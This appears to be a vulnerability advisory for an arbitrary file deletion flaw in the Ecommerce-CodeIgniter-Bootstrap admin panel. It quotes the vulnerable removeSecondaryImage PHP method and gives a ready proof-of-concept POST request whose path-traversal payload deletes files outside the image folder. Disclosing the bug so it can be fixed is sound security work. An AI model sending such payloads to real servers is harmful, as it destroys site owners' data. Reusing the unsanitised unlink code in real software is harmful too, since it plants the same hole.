vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)
version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)
An arbitrary file deletion (CWE-73) vulnerability is in application/modules/admin/controllers/ecommerce/Publish.php
.
In the method removeSecondaryImage
, the attacker can delete any file in the server by controlling $_POST['folder']
and
$_POST['image']
after authorization.
public function removeSecondaryImage()
{
if ($this->input->is_ajax_request()) {
$img = '.' . DIRECTORY_SEPARATOR . 'attachments' . DIRECTORY_SEPARATOR . 'shop_images' . DIRECTORY_SEPARATOR . '' . $_POST['folder'] . DIRECTORY_SEPARATOR . $_POST['image'];
unlink($img);
}
}
POST /Ecommerce-CodeIgniter-Bootstrap/admin/removeSecondaryImage HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/publish
Cookie: ci_session=8qfeq95l0u1nfjpj6clgr5p976m7igkh; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
image=README.md&folder=../../